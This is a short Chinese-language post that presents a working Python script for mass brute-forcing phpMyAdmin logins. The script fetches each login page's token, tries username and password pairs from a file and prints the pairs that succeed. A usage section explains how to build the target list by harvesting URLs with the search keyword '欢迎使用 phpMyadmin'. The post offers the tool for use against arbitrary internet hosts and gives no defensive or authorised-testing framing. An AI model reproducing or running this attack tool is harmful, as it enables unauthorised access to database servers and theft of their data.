python批量爆破phpMyadmin

使用python实现phpMyadmin的批量爆破

0x01 脚本实现

import requests
from bs4 import BeautifulSoup as bp
def attack(url,username,password):
    headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36"}
    session=requests.session()
    try:
        response=session.get(url,headers=headers)
        soup=bp(response.text,"lxml")
        my_Dict={"type":"hidden","name":"token"}
        tiqu=soup.find(attrs=my_Dict)
        data={}
        data["token"]=tiqu.get("value",0)
        if data==0:
            return "no token"
        data['pma_username']=username
        data['pma_password']=password
        index_url=url+"index.php"
        response1=session.post(url=index_url,data=data)
        htmls=response1.text
        if "phpMyAdmin is more friendly with a " in htmls:
            print("[+] username:{0}, password:{1}".format(username,password))
        else:
            pass
    except Exception as e:
        pass


if __name__=='__main__':
    with open('./Good.txt','r') as urls:
        host_t=urls.readlines()
        for url in host_t:
            if url[-1]=='\n':
                url=url[:-1]
            with open("mima.txt","r") as mima:
                my_mima=mima.readlines()
                for mima in my_mima:
                    username,password=mima.split("|")
                    print("attack {0} use username:{1}|password:{2}".format(url,username,password))
                    attack(url,username,password)

0x02 脚本的使用

• 先用批量采集工具采集url（关键词：“欢迎使用 phpMyadmin”）
• 将采集的url导出为Good.txt路径
• 然后密码的格式为: root|toor ，|左边为root,右边为toor